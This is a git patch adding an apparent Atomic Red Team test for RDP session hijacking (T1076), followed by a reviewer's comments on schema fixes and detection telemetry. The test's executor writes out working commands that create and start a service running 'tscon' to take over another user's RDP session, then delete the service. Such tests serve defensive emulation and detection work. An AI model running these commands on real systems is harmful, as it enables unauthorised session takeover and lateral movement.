From 5f6014148dcc41d12813cce2d27ed26b81c0f2d2 Mon Sep 17 00:00:00 2001
From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag>
Date: Fri, 25 May 2018 09:35:52 -0400
Subject: [PATCH] T1076 T1076 shipment
---
atomics/T1076/T1076.yaml | 20 ++++++++++++++++++++
1 file changed, 20 insertions(+)
create mode 100644 atomics/T1076/T1076.yaml
diff --git a/atomics/T1076/T1076.yaml b/atomics/T1076/T1076.yaml
new file mode 100644
index 00000000..d1c4152b
--- /dev/null
+++ b/atomics/T1076/T1076.yaml
@@ -0,0 +1,20 @@
+---
+attack_technique: T1076
+display_name: Remote Desktop Protocol
+
+atomic_tests:
+- name: RDP
+ description: |
+ RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) — how to hijack RDS and RemoteApp sessions transparently to move through an organization
+
+
+ supported_platforms:
+ - windows
+
+ executor:
+ name: command_prompt
+ command: |
+ query user
+ sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
+ net start sesshijack
+ sc.exe delete sesshijack
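Review bot: The markdown link in the `description` block is missing its opening bracket, so it renders as literal text; change the line to `[RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) — how to hijack RDS and RemoteApp sessions transparently to move through an organization`. The executor creates, starts and deletes a service with `sc.exe`, which only works from an elevated prompt, so the executor should declare `elevation_required: true` as the Atomic Red Team schema allows. The session id `1337` and `rdp-tcp#55` in the `binpath=` are hard-coded sample values that will not exist on a real host, so the description should state they are placeholders or the test should expose them as `input_arguments`. For validation against telemetry, the description could also state what the test is expected to leave behind — a service creation whose image path contains `tscon`, as the `sc.exe create` line shows — so defenders know which event to check for.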